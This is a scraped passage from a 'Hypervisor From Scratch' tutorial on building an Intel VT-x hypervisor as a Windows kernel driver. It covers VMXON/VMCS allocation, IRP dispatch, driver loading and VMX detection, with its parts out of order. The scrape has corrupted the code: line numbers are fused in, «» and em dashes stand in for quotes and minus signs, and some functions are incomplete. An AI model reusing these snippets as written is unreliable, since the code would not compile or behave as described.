basic = { 0 };   basic.All = __readmsr(MSR_IA32_VMX_BASIC);  DbgPrint(«[*] MSR_IA32_VMX_BASIC (MSR 0x480) Revision Identifier %llx», basic.Fields.RevisionIdentifier);   //* (UINT64 *)alignedVirtualBuffer  = 04;  //Changing Revision Identifier *(UINT64 *)alignedVirtualBuffer = basic.Fields.RevisionIdentifier;   int status = __vmx_on(&alignedPhysicalBuffer); if (status) { DbgPrint(«[*] VMXON failed with status %d\n», status); return FALSE; }  vmState->VMXON_REGION = alignedPhysicalBuffer;  return TRUE;}

Let’s explain the  above function,

123 // at IRQL > DISPATCH_LEVEL memory allocation routines don’t work if (KeGetCurrentIrql() > DISPATCH_LEVEL) KeRaiseIrqlToDpcLevel();

This code is for changing current IRQL Level to DISPATCH_LEVEL but we can ignore this code as long as we use MmAllocateContiguousMemory but if you want to use another type of memory for your VMXON region you should use  MmAllocateContiguousMemorySpecifyCache (commented), other types of memory you can use can be found here.

Note that to ensure proper behavior in VMX operation, you should maintain the VMCS region and related structures in writeback cacheable memory. Alternatively, you may map any of these regions or structures with the UC memory type. Doing so is strongly discouraged unless necessary as it will cause the performance of transitions using those structures to suffer significantly.

Write-back is a storage method in which data is written into the cache every time a change occurs, but is written into the corresponding location in main memory only at specified intervals or under certain conditions. Being cachable or not cachable can be determined from the cache disable bit in paging structures (PTE).

By the way, we should allocate 8192 Byte because there is no guarantee that Windows allocates the aligned memory so we can find a piece of 4096 Bytes aligned in 8196 Bytes. (by aligning I mean, the physical address should be divisible by 4096 without any reminder).

In my experience, the MmAllocateContiguousMemory allocation is always aligned, maybe it is because every page in PFN are allocated by 4096 bytes and as long as we need 4096 Bytes, then it’s aligned.

If you are interested in Page Frame Number (PFN) then you can read Inside Windows Page Frame Number (PFN) – Part 1 and Inside Windows Page Frame Number (PFN) – Part 2.

123456789 PHYSICAL_ADDRESS PhysicalMax = { 0 }; PhysicalMax.QuadPart = MAXULONG64;  int VMXONSize = 2 * VMXON_SIZE; BYTE* Buffer = MmAllocateContiguousMemory(VMXONSize, PhysicalMax);  // Allocating a 4-KByte Contigous Memory region if (Buffer == NULL) { DbgPrint(«[*] Error : Couldn’t Allocate Buffer for VMXON Region.»); return FALSE;// ntStatus = STATUS_INSUFFICIENT_RESOURCES; }

Now we should convert the address of the allocated memory to its physical address and make sure it’s aligned.

Memory that MmAllocateContiguousMemory allocates is uninitialized. A kernel-mode driver must first set this memory to zero. Now we should use RtlSecureZeroMemory for this case.

12345678910 UINT64 PhysicalBuffer = VirtualAddress_to_PhysicallAddress(Buffer);  // zero-out memory RtlSecureZeroMemory(Buffer, VMXONSize + ALIGNMENT_PAGE_SIZE); UINT64 alignedPhysicalBuffer = (BYTE*)((ULONG_PTR)(PhysicalBuffer + ALIGNMENT_PAGE_SIZE — 1) &~(ALIGNMENT_PAGE_SIZE — 1)); UINT64 alignedVirtualBuffer = (BYTE*)((ULONG_PTR)(Buffer + ALIGNMENT_PAGE_SIZE — 1) &~(ALIGNMENT_PAGE_SIZE — 1));  DbgPrint(«[*] Virtual allocated buffer for VMXON at %llx», Buffer); DbgPrint(«[*] Virtual aligned allocated buffer for VMXON at %llx», alignedVirtualBuffer); DbgPrint(«[*] Aligned physical buffer allocated for VMXON at %llx», alignedPhysicalBuffer);

From Intel’s manual (24.11.5 VMXON Region ):

Before executing VMXON, software should write the VMCS revision identifier to the VMXON region. (Specifically, it should write the 31-bit VMCS revision identifier to bits 30:0 of the first 4 bytes of the VMXON region; bit 31 should be cleared to 0.)

It need not initialize the VMXON region in any other way. Software should use a separate region for each logical processor and should not access or modify the VMXON region of a logical processor between the execution of VMXON and VMXOFF on that logical processor. Doing otherwise may lead to unpredictable behavior.

So let’s get the Revision Identifier from IA32_VMX_BASIC_MSR  and write it to our VMXON Region.

1234567891011 // get IA32_VMX_BASIC_MSR RevisionId  IA32_VMX_BASIC_MSR basic = { 0 };   basic.All = __readmsr(MSR_IA32_VMX_BASIC);  DbgPrint(«[*] MSR_IA32_VMX_BASIC (MSR 0x480) Revision Identifier %llx», basic.Fields.RevisionIdentifier);  //Changing Revision Identifier *(UINT64 *)alignedVirtualBuffer = basic.Fields.RevisionIdentifier;

The last part is used for executing VMXON instruction.

12345678910 int status = __vmx_on(&alignedPhysicalBuffer); if (status) { DbgPrint(«[*] VMXON failed with status %d\n», status); return FALSE; }  vmState->VMXON_REGION = alignedPhysicalBuffer;  return TRUE;

__vmx_on is the intrinsic function for executing VMXON. The status code shows diffrenet meanings.

0The operation succeeded.
1The operation failed with extended status available in the VM-instruction error field of the current VMCS.
2The operation failed without status available.

If we set the VMXON Region using VMXON and it fails then status = 1. If there isn’t any VMCS the status =2 and if the operation was successful then status =0.

If you execute the above code twice without executing VMXOFF then you definitely get errors.

Now, our VMXON Region is ready and we’re good to go.

Virtual-Machine Control Data Structures (VMCS)

A logical processor uses virtual-machine control data structures (VMCSs) while it is in VMX operation. These manage transitions into and out of VMX non-root operation (VM entries and VM exits) as well as processor behavior in VMX non-root operation. This structure is manipulated by the new instructions VMCLEAR, VMPTRLD, VMREAD, and VMWRITE.

VMX Life cycle

The above picture illustrates the lifecycle VMX operation on VMCS Region.

Initializing  VMCS Region

A VMM can (should) use different VMCS Regions so you need to set logical processor affinity and run you initialization routine multiple times.

The location where the VMCS located is called “VMCS Region”.

VMCS Region is a

  • 4 Kbyte (bits 11:0 must be zero)
  • Must be aligned to the 4KB boundary

This pointer must not set bits beyond the processor’s physical-address width (Software can determine a processor’s physical-address width by executing CPUID with 80000008H in EAX. The physical-address width is returned in bits 7:0 of EAX.)

There might be several VMCSs simultaneously in a processor but just one of them is currently active and the VMLAUNCH, VMREAD, VMRESUME, and VMWRITE instructions operate only on the current VMCS.

Using VMPTRLD sets the current VMCS on a logical processor.

The memory operand of the VMCLEAR instruction is also the address of a VMCS. After execution of the instruction, that VMCS is neither active nor current on the logical processor. If the VMCS had been current on the logical processor, the logical processor no longer has a current VMCS.

VMPTRST is responsible to give the current VMCS pointer it stores the value FFFFFFFFFFFFFFFFH if there is no current VMCS.

The launch state of a VMCS determines which VM-entry instruction should be used with that VMCS. The VMLAUNCH instruction requires a VMCS whose launch state is “clear”; the VMRESUME instruction requires a VMCS whose launch state is “launched”. A logical processor maintains a VMCS’s launch state in the corresponding VMCS region.

If the launch state of the current VMCS is “clear”, successful execution of the VMLAUNCH instruction changes the launch state to “launched”.

The memory operand of the VMCLEAR instruction is the address of a VMCS. After execution of the instruction, the launch state of that VMCS is “clear”.

There are no other ways to modify the launch state of a VMCS (it cannot be modified using VMWRITE) and there is no direct way to discover it (it cannot be read using VMREAD).

The following picture illustrates the contents of a VMCS Region.

VMCS Region

The following code is responsible for allocating VMCS Region :

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061BOOLEAN Allocate_VMCS_Region(IN PVirtualMachineState vmState){ // at IRQL > DISPATCH_LEVEL memory allocation routines don’t work if (KeGetCurrentIrql() > DISPATCH_LEVEL) KeRaiseIrqlToDpcLevel();   PHYSICAL_ADDRESS PhysicalMax = { 0 }; PhysicalMax.QuadPart = MAXULONG64;   int VMCSSize = 2 * VMCS_SIZE; BYTE* Buffer = MmAllocateContiguousMemory(VMCSSize + ALIGNMENT_PAGE_SIZE, PhysicalMax);  // Allocating a 4-KByte Contigous Memory region  PHYSICAL_ADDRESS Highest = { 0 }, Lowest = { 0 }; Highest.QuadPart = ~0;  //BYTE* Buffer = MmAllocateContiguousMemorySpecifyCache(VMXONSize + ALIGNMENT_PAGE_SIZE, Lowest, Highest, Lowest, MmNonCached);  UINT64 PhysicalBuffer = VirtualAddress_to_PhysicallAddress(Buffer); if (Buffer == NULL) { DbgPrint(«[*] Error : Couldn’t Allocate Buffer for VMCS Region.»); return FALSE;// ntStatus = STATUS_INSUFFICIENT_RESOURCES; } // zero-out memory RtlSecureZeroMemory(Buffer, VMCSSize + ALIGNMENT_PAGE_SIZE); UINT64 alignedPhysicalBuffer = (BYTE*)((ULONG_PTR)(PhysicalBuffer + ALIGNMENT_PAGE_SIZE — 1) &~(ALIGNMENT_PAGE_SIZE — 1));  UINT64 alignedVirtualBuffer = (BYTE*)((ULONG_PTR)(Buffer + ALIGNMENT_PAGE_SIZE — 1) &~(ALIGNMENT_PAGE_SIZE — 1));    DbgPrint(«[*] Virtual allocated buffer for VMCS at %llx», Buffer); DbgPrint(«[*] Virtual aligned allocated buffer for VMCS at %llx», alignedVirtualBuffer); DbgPrint(«[*] Aligned physical buffer allocated for VMCS at %llx», alignedPhysicalBuffer);  // get IA32_VMX_BASIC_MSR RevisionId  IA32_VMX_BASIC_MSR basic = { 0 };   basic.All = __readmsr(MSR_IA32_VMX_BASIC);  DbgPrint(«[*] MSR_IA32_VMX_BASIC (MSR 0x480) Revision Identifier %llx», basic.Fields.RevisionIdentifier);   //Changing Revision Identifier *(UINT64 *)alignedVirtualBuffer = basic.Fields.RevisionIdentifier;   int status = __vmx_vmptrld(&alignedPhysicalBuffer); if (status) { DbgPrint(«[*] VMCS failed with status %d\n», status); return FALSE; }  vmState->VMCS_REGION = alignedPhysicalBuffer;  return TRUE;}

The above code is exactly the same as VMXON Region except for __vmx_vmptrld instead of __vmx_on__vmx_vmptrld  is the intrinsic function for VMPTRLD instruction.

In VMCS also we should find the Revision Identifier from MSR_IA32_VMX_BASIC  and write in VMCS Region before executing VMPTRLD.

The MSR_IA32_VMX_BASIC  is defined as below.

123456789101112131415161718typedef union _IA32_VMX_BASIC_MSR{ ULONG64 All; struct { ULONG32 RevisionIdentifier : 31;   // [0-30] ULONG32 Reserved1 : 1;             // [31] ULONG32 RegionSize : 12;           // [32-43] ULONG32 RegionClear : 1;           // [44] ULONG32 Reserved2 : 3;             // [45-47] ULONG32 SupportedIA64 : 1;         // [48] ULONG32 SupportedDualMoniter : 1;  // [49] ULONG32 MemoryType : 4;            // [50-53] ULONG32 VmExitReport : 1;          // [54] ULONG32 VmxCapabilityHint : 1;     // [55] ULONG32 Reserved3 : 8;             // [56-63] } Fields;} IA32_VMX_BASIC_MSR, *PIA32_VMX_BASIC_MSR;


After configuring the above regions, now its time to think about DrvClose when the handle to the driver is no longer maintained by the user-mode application. At this time, we should terminate VMX and free every memory that we allocated before.

The following function is responsible for executing VMXOFF then calling to MmFreeContiguousMemoryin order to free the allocated memory :

123456789101112131415161718192021void Terminate_VMX(void) {  DbgPrint(«\n[*] Terminating VMX…\n»);  KAFFINITY kAffinityMask; for (size_t i = 0; i < ProcessorCounts; i++) { kAffinityMask = ipow(2, i); KeSetSystemAffinityThread(kAffinityMask); DbgPrint(«\t\tCurrent thread is executing in %d th logical processor.», i);   __vmx_off(); MmFreeContiguousMemory(PhysicalAddress_to_VirtualAddress(vmState[i].VMXON_REGION)); MmFreeContiguousMemory(PhysicalAddress_to_VirtualAddress(vmState[i].VMCS_REGION));  }  DbgPrint(«[*] VMX Operation turned off successfully. \n»); }

Keep in mind to convert VMXON and VMCS Regions to virtual address because MmFreeContiguousMemory accepts VA, otherwise, it leads to a BSOD.

Ok, It’s almost done!

Testing our VMM

Let’s create a test case for our code, first a function for Initiating VMXON and VMCS Regions through all logical processor.

1234567891011121314151617181920212223242526272829303132333435363738PVirtualMachineState vmState;int ProcessorCounts; PVirtualMachineState Initiate_VMX(void) {  if (!Is_VMX_Supported()) { DbgPrint(«[*] VMX is not supported in this machine !»); return NULL; }  ProcessorCounts = KeQueryActiveProcessorCount(0); vmState = ExAllocatePoolWithTag(NonPagedPool, sizeof(VirtualMachineState)* ProcessorCounts, POOLTAG);   DbgPrint(«\n=====================================================\n»);  KAFFINITY kAffinityMask; for (size_t i = 0; i < ProcessorCounts; i++) { kAffinityMask = ipow(2, i); KeSetSystemAffinityThread(kAffinityMask); // do st here ! DbgPrint(«\t\tCurrent thread is executing in %d th logical processor.», i);  Enable_VMX_Operation(); // Enabling VMX Operation DbgPrint(«[*] VMX Operation Enabled Successfully !»);  Allocate_VMXON_Region(&vmState[i]); Allocate_VMCS_Region(&vmState[i]);   DbgPrint(«[*] VMCS Region is allocated at  ===============> %llx», vmState[i].VMCS_REGION); DbgPrint(«[*] VMXON Region is allocated at ===============> %llx», vmState[i].VMXON_REGION);  DbgPrint(«\n=====================================================\n»); }}

The above function should be called from IRP MJ CREATE so let’s modify our DrvCreate to :

123456789101112131415NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){  DbgPrint(«[*] DrvCreate Called !»);  if (Initiate_VMX()) { DbgPrint(«[*] VMX Initiated Successfully.»); }  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;}

And modify DrvClose to :

12345678910111213NTSTATUS DrvClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] DrvClose Called !»);  // executing VMXOFF on every logical processor Terminate_VMX();  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;}

Now, run the code, In the case of creating the handle (You can see that our regions allocated successfully).

VMX Regions

And when we call CloseHandle from user mode:


Source code

The source code of this part of the tutorial is available on my GitHub.


In this part we learned about different types of IOCTL Dispatching, then we see different functions in Windows to manage our hypervisor VMM and we initialized the VMXON Regions and VMCS Regions then we terminate them.

In the future part, we’ll focus on VMCS and different actions that can be performed in VMCS Regions in order to control our guest software.


[1] Intel® 64 and IA-32 architectures software developer’s manual combined volumes 3 (https://software.intel.com/en-us/articles/intel-sdm

[2] Windows Driver Samples (https://github.com/Microsoft/Windows-driver-samples)

[3] Driver Development Part 2: Introduction to Implementing IOCTLs (https://www.codeproject.com/Articles/9575/Driver-Development-Part-2-Introduction-to-Implemen)

[3] Hyperplatform (https://github.com/tandasat/HyperPlatform)

[4] PAGED_CODE macro (https://technet.microsoft.com/en-us/ff558773(v=vs.96))

[5] HVPP (https://github.com/wbenny/hvpp)

[6] HyperBone Project (https://github.com/DarthTon/HyperBone)

[7] Memory Caching Types (https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/ne-wdm-_memory_caching_type)

[8] What is write-back cache? (https://whatis.techtarget.com/definition/write-back)

Hypervisor From Scratch – Part 2: Entering VMX Operation

Original text bySinaei )

Hi guys,

It’s the second part of a multiple series of a tutorial called “Hypervisor From Scratch”, First I highly recommend to read the first part (Basic Concepts & Configure Testing Environment) before reading this part, as it contains the basic knowledge you need to know in order to understand the rest of this tutorial.

In this section, we will learn about Detecting Hypervisor Support for our processor, then we simply config the basic stuff to Enable VMX and Entering VMX Operation and a lot more thing about Window Driver Kit (WDK).

Configuring Our IRP Major Functions

Beside our kernel-mode driver (“MyHypervisorDriver“), I created a user-mode application called “MyHypervisorApp“, first of all (The source code is available in my GitHub), I should encourage you to write most of your codes in user-mode rather than kernel-mode and that’s because you might not have handled exceptions so it leads to BSODs, or on the other hand, running less code in kernel-mode reduces the possibility of putting some nasty kernel-mode bugs.

If you remember from the previous part, we create some Windows Driver Kit codes, now we want to develop our project to support more IRP Major Functions.

IRP Major Functions are located in a conventional Windows table that is created for every device, once you register your device in Windows, you have to introduce these functions in which you handle these IRP Major Functions. That’s like every device has a table of its Major Functions and everytime a user-mode application calls any of these functions, Windows finds the corresponding function (if device driver supports that MJ Function) based on the device that requested by the user and calls it then pass an IRP pointer to the kernel driver.

Now its responsibility of device function to check the privileges or etc.

The following code creates the device :

12345678910111213 NTSTATUS NtStatus = STATUS_SUCCESS; UINT64 uiIndex = 0; PDEVICE_OBJECT pDeviceObject = NULL; UNICODE_STRING usDriverName, usDosDeviceName;  DbgPrint(«[*] DriverEntry Called.»);   RtlInitUnicodeString(&usDriverName, L»\\Device\\MyHypervisorDevice»); RtlInitUnicodeString(&usDosDeviceName, L»\\DosDevices\\MyHypervisorDevice»);  NtStatus = IoCreateDevice(pDriverObject, 0, &usDriverName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDeviceObject); NTSTATUS NtStatusSymLinkResult = IoCreateSymbolicLink(&usDosDeviceName, &usDriverName);

Note that our device name is “\Device\MyHypervisorDevice.

After that, we need to introduce our Major Functions for our device.

1234567891011121314151617 if (NtStatus == STATUS_SUCCESS && NtStatusSymLinkResult == STATUS_SUCCESS) { for (uiIndex = 0; uiIndex < IRP_MJ_MAXIMUM_FUNCTION; uiIndex++) pDriverObject->MajorFunction[uiIndex] = DrvUnsupported;  DbgPrint(«[*] Setting Devices major functions.»); pDriverObject->MajorFunction[IRP_MJ_CLOSE] = DrvClose; pDriverObject->MajorFunction[IRP_MJ_CREATE] = DrvCreate; pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DrvIOCTLDispatcher; pDriverObject->MajorFunction[IRP_MJ_READ] = DrvRead; pDriverObject->MajorFunction[IRP_MJ_WRITE] = DrvWrite;  pDriverObject->DriverUnload = DrvUnload; } else { DbgPrint(«[*] There was some errors in creating device.»); }

You can see that I put “DrvUnsupported” to all functions, this is a function to handle all MJ Functions and told the user that it’s not supported. The main body of this function is like this:

12345678910NTSTATUS DrvUnsupported(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] This function is not supported 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;}

We also introduce other major functions that are essential for our device, we’ll complete the implementation in the future, let’s just leave them alone.

12345678910111213141516171819202122232425262728293031323334353637383940414243NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;} NTSTATUS DrvRead(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;} NTSTATUS DrvWrite(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;} NTSTATUS DrvClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;}

Now let’s see IRP MJ Functions list and other types of Windows Driver Kit handlers routine.

IRP Major Functions List

This is a list of IRP Major Functions which we can use in order to perform different operations.

123456789101112131415161718192021222324252627282930#define IRP_MJ_CREATE                   0x00#define IRP_MJ_CREATE_NAMED_PIPE        0x01#define IRP_MJ_CLOSE                    0x02#define IRP_MJ_READ                     0x03#define IRP_MJ_WRITE                    0x04#define IRP_MJ_QUERY_INFORMATION        0x05#define IRP_MJ_SET_INFORMATION          0x06#define IRP_MJ_QUERY_EA                 0x07#define IRP_MJ_SET_EA                   0x08#define IRP_MJ_FLUSH_BUFFERS            0x09#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a#define IRP_MJ_SET_VOLUME_INFORMATION   0x0b#define IRP_MJ_DIRECTORY_CONTROL        0x0c#define IRP_MJ_FILE_SYSTEM_CONTROL      0x0d#define IRP_MJ_DEVICE_CONTROL           0x0e#define IRP_MJ_INTERNAL_DEVICE_CONTROL  0x0f#define IRP_MJ_SHUTDOWN                 0x10#define IRP_MJ_LOCK_CONTROL             0x11#define IRP_MJ_CLEANUP                  0x12#define IRP_MJ_CREATE_MAILSLOT          0x13#define IRP_MJ_QUERY_SECURITY           0x14#define IRP_MJ_SET_SECURITY             0x15#define IRP_MJ_POWER                    0x16#define IRP_MJ_SYSTEM_CONTROL           0x17#define IRP_MJ_DEVICE_CHANGE            0x18#define IRP_MJ_QUERY_QUOTA              0x19#define IRP_MJ_SET_QUOTA                0x1a#define IRP_MJ_PNP                      0x1b#define IRP_MJ_PNP_POWER                IRP_MJ_PNP      // Obsolete….#define IRP_MJ_MAXIMUM_FUNCTION         0x1b

Every major function will only trigger if we call its corresponding function from user-mode. For instance, there is a function (in user-mode) called CreateFile (And all its variants like CreateFileA and CreateFileW for ASCII and Unicode) so everytime we call CreateFile the function that registered as IRP_MJ_CREATE will be called or if we call ReadFile then IRP_MJ_READ and WriteFile then IRP_MJ_WRITE  will be called. You can see that Windows treats its devices like files and everything we need to pass from user-mode to kernel-mode is available in PIRP Irp as a buffer when the function is called.

In this case, Windows is responsible to copy user-mode buffer to kernel mode stack.

Don’t worry we use it frequently in the rest of the project but we only support IRP_MJ_CREATE in this part and left others unimplemented for our future parts.

IRP Minor Functions

IRP Minor functions are mainly used for PnP manager to notify for a special event, for example,The PnP manager sends IRP_MN_START_DEVICE  after it has assigned hardware resources, if any, to the device or The PnP manager sends IRP_MN_STOP_DEVICE to stop a device so it can reconfigure the device’s hardware resources.

We will need these minor functions later in these series.

A list of IRP Minor Functions is available below:


Fast I/O

For optimizing VMM, you can use Fast I/O which is a different way to initiate I/O operations that are faster than IRP. Fast I/O operations are always synchronous.

According to MSDN:

Fast I/O is specifically designed for rapid synchronous I/O on cached files. In fast I/O operations, data is transferred directly between user buffers and the system cache, bypassing the file system and the storage driver stack. (Storage drivers do not use fast I/O.) If all of the data to be read from a file is resident in the system cache when a fast I/O read or write request is received, the request is satisfied immediately. 

When the I/O Manager receives a request for synchronous file I/O (other than paging I/O), it invokes the fast I/O routine first. If the fast I/O routine returns TRUE, the operation was serviced by the fast I/O routine. If the fast I/O routine returns FALSE, the I/O Manager creates and sends an IRP instead.

The definition of Fast I/O Dispatch table is:

123456789101112131415161718192021222324252627282930typedef struct _FAST_IO_DISPATCH {  ULONG                                  SizeOfFastIoDispatch;  PFAST_IO_CHECK_IF_POSSIBLE             FastIoCheckIfPossible;  PFAST_IO_READ                          FastIoRead;  PFAST_IO_WRITE                         FastIoWrite;  PFAST_IO_QUERY_BASIC_INFO              FastIoQueryBasicInfo;  PFAST_IO_QUERY_STANDARD_INFO           FastIoQueryStandardInfo;  PFAST_IO_LOCK                          FastIoLock;  PFAST_IO_UNLOCK_SINGLE                 FastIoUnlockSingle;  PFAST_IO_UNLOCK_ALL                    FastIoUnlockAll;  PFAST_IO_UNLOCK_ALL_BY_KEY             FastIoUnlockAllByKey;  PFAST_IO_DEVICE_CONTROL                FastIoDeviceControl;  PFAST_IO_ACQUIRE_FILE                  AcquireFileForNtCreateSection;  PFAST_IO_RELEASE_FILE                  ReleaseFileForNtCreateSection;  PFAST_IO_DETACH_DEVICE                 FastIoDetachDevice;  PFAST_IO_QUERY_NETWORK_OPEN_INFO       FastIoQueryNetworkOpenInfo;  PFAST_IO_ACQUIRE_FOR_MOD_WRITE         AcquireForModWrite;  PFAST_IO_MDL_READ                      MdlRead;  PFAST_IO_MDL_READ_COMPLETE             MdlReadComplete;  PFAST_IO_PREPARE_MDL_WRITE             PrepareMdlWrite;  PFAST_IO_MDL_WRITE_COMPLETE            MdlWriteComplete;  PFAST_IO_READ_COMPRESSED               FastIoReadCompressed;  PFAST_IO_WRITE_COMPRESSED              FastIoWriteCompressed;  PFAST_IO_MDL_READ_COMPLETE_COMPRESSED  MdlReadCompleteCompressed;  PFAST_IO_MDL_WRITE_COMPLETE_COMPRESSED MdlWriteCompleteCompressed;  PFAST_IO_QUERY_OPEN                    FastIoQueryOpen;  PFAST_IO_RELEASE_FOR_MOD_WRITE         ReleaseForModWrite;  PFAST_IO_ACQUIRE_FOR_CCFLUSH           AcquireForCcFlush;  PFAST_IO_RELEASE_FOR_CCFLUSH           ReleaseForCcFlush;} FAST_IO_DISPATCH, *PFAST_IO_DISPATCH;

Defined Headers

I created the following headers (source.h) for my driver.

12345678910111213141516171819202122232425262728293031323334#pragma once#include <ntddk.h>#include <wdf.h>#include <wdm.h> extern void inline Breakpoint(void);extern void inline Enable_VMX_Operation(void);  NTSTATUS DriverEntry(PDRIVER_OBJECT  pDriverObject, PUNICODE_STRING  pRegistryPath);VOID DrvUnload(PDRIVER_OBJECT  DriverObject);NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvRead(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvWrite(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvUnsupported(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvIOCTLDispatcher(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp); VOID PrintChars(_In_reads_(CountChars) PCHAR BufferAddress, _In_ size_t CountChars);VOID PrintIrpInfo(PIRP Irp); #pragma alloc_text(INIT, DriverEntry)#pragma alloc_text(PAGE, DrvUnload)#pragma alloc_text(PAGE, DrvCreate)#pragma alloc_text(PAGE, DrvRead)#pragma alloc_text(PAGE, DrvWrite)#pragma alloc_text(PAGE, DrvClose)#pragma alloc_text(PAGE, DrvUnsupported)#pragma alloc_text(PAGE, DrvIOCTLDispatcher)   // IOCTL Codes and Its meanings#define IOCTL_TEST 0x1 // In case of testing

Now just compile your driver.

Loading Driver and Check the presence of Device

In order to load our driver (MyHypervisorDriver) first download OSR Driver Loader, then run Sysinternals DbgView as administrator make sure that your DbgView captures the kernel (you can check by going Capture -> Capture Kernel).

Enable Capturing Event

After that open the OSR Driver Loader (go to OsrLoader -> kit-> WNET -> AMD64 -> FRE) and open OSRLOADER.exe (in an x64 environment). Now if you built your driver, find .sys file (in MyHypervisorDriver\x64\Debug\ should be a file named: “MyHypervisorDriver.sys”), in OSR Driver Loader click to browse and select (MyHypervisorDriver.sys) and then click to “Register Service” after the message box that shows your driver registered successfully, you should click on “Start Service”.

Please note that you should have WDK installed for your Visual Studio in order to be able building your project.

Load Driver in OSR Driver Loader

Now come back to DbgView, then you should see that your driver loaded successfully and a message “[*] DriverEntry Called. ” should appear.

If there is no problem then you’re good to go, otherwise, if you have a problem with DbgView you can check the next step.

Keep in mind that now you registered your driver so you can use SysInternals WinObj in order to see whether “MyHypervisorDevice” is available or not.


The Problem with DbgView

Unfortunately, for some unknown reasons, I’m not able to view the result of DbgPrint(), If you can see the result then you can skip this step but if you have a problem, then perform the following steps:

As I mentioned in part 1:

In regedit, add a key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Debug Print Filter

Under that , add a DWORD value named IHVDRIVER with a value of 0xFFFF

Reboot the machine and you’ll good to go.

It always works for me and I tested on many computers but my MacBook seems to have a problem.

In order to solve this problem, you need to find a Windows Kernel Global variable called, nt!Kd_DEFAULT_Mask, this variable is responsible for showing the results in DbgView, it has a mask that I’m not aware of so I just put a 0xffffffff in it to simply make it shows everything!

To do this, you need a Windows Local Kernel Debugging using Windbg.

  1. Open a Command Prompt window as Administrator. Enter bcdedit /debug on
  2. If the computer is not already configured as the target of a debug transport, enter bcdedit /dbgsettings local
  3. Reboot the computer.

After that you need to open Windbg with UAC Administrator privilege, go to File > Kernel Debug > Local > press OK and in you local Windbg find the nt!Kd_DEFAULT_Mask using the following command :

12prlkd> x nt!kd_Default_Maskfffff801`f5211808 nt!Kd_DEFAULT_Mask = <no type information>

Now change it value to 0xffffffff.

1lkd> eb fffff801`f5211808 ff ff ff ff

After that, you should see the results and now you’ll good to go.

Remember this is an essential step for the rest of the topic, because if we can’t see any kernel detail then we can’t debug.


Detecting Hypervisor Support

Discovering support for vmx is the first thing that you should consider before enabling VT-x, this is covered in Intel Software Developer’s Manual volume 3C in section 23.6 DISCOVERING SUPPORT FOR VMX.

You could know the presence of VMX using CPUID if CPUID.1:ECX.VMX[bit 5] = 1, then VMX operation is supported.

First of all, we need to know if we’re running on an Intel-based processor or not, this can be understood by checking the CPUID instruction and find vendor string “GenuineIntel“.

The following function returns the vendor string form CPUID instruction.

12345678910111213141516171819202122232425262728293031323334353637string GetCpuID(){ //Initialize used variables char SysType[13]; //Array consisting of 13 single bytes/characters string CpuID; //The string that will be used to add all the characters to   //Starting coding in assembly language _asm { //Execute CPUID with EAX = 0 to get the CPU producer XOR EAX, EAX CPUID //MOV EBX to EAX and get the characters one by one by using shift out right bitwise operation. MOV EAX, EBX MOV SysType[0], al MOV SysType[1], ah SHR EAX, 16 MOV SysType[2], al MOV SysType[3], ah //Get the second part the same way but these values are stored in EDX MOV EAX, EDX MOV SysType[4], al MOV SysType[5], ah SHR EAX, 16 MOV SysType[6], al MOV SysType[7], ah //Get the third part MOV EAX, ECX MOV SysType[8], al MOV SysType[9], ah SHR EAX, 16 MOV SysType[10], al MOV SysType[11], ah MOV SysType[12], 00 } CpuID.assign(SysType, 12); return CpuID;}

The last step is checking for the presence of VMX, you can check it using the following code :

1234567891011121314151617181920bool VMX_Support_Detection(){  bool VMX = false; __asm { xor    eax, eax inc    eax cpuid bt     ecx, 0x5 jc     VMXSupport VMXNotSupport : jmp     NopInstr VMXSupport : mov    VMX, 0x1 NopInstr : nop }  return VMX;}

As you can see it checks CPUID with EAX=1 and if the 5th (6th) bit is 1 then the VMX Operation is supported. We can also perform the same thing in Kernel Driver.

All in all, our main code should be something like this:

